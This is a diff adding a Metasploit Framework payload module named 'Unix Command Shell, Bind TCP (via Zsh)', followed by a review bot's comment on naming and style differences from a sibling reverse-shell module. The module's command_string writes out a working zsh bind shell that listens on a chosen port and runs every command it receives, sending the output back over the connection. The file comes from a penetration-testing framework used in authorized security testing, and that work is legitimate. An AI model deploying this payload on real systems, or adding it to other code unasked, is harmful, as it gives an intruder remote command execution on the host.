@@ -0,0 +1,62 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit4 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Bind TCP (via Zsh)', + 'Description' => %q{ + Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is + often available, please be aware it isn't usually installed by default. + }, + 'Author' => + [ + 'Doug Prostko ' + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'zsh', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = "zmodload zsh/net/tcp;" + cmd << "ztcp -l #{datastore['LPORT']};" + cmd << "ztcp -a $REPLY;" + cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;" + cmd << "ztcp -c" + cmd + end +end
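Review bot: This module is declared `module Metasploit4` whereas the reverse_zsh payload added in the previous commit of this series declares `module Metasploit3`; the two files are otherwise parallel, and unless the difference is intended (the numeric suffix presumably selects the module API version — please confirm) they should agree. `return super + command_string` in `generate` could drop the explicit `return`, since `command_string` relies on the implicit value of its last expression, and `'Offsets' => { }` here versus `{}` in reverse_zsh is another small divergence worth unifying.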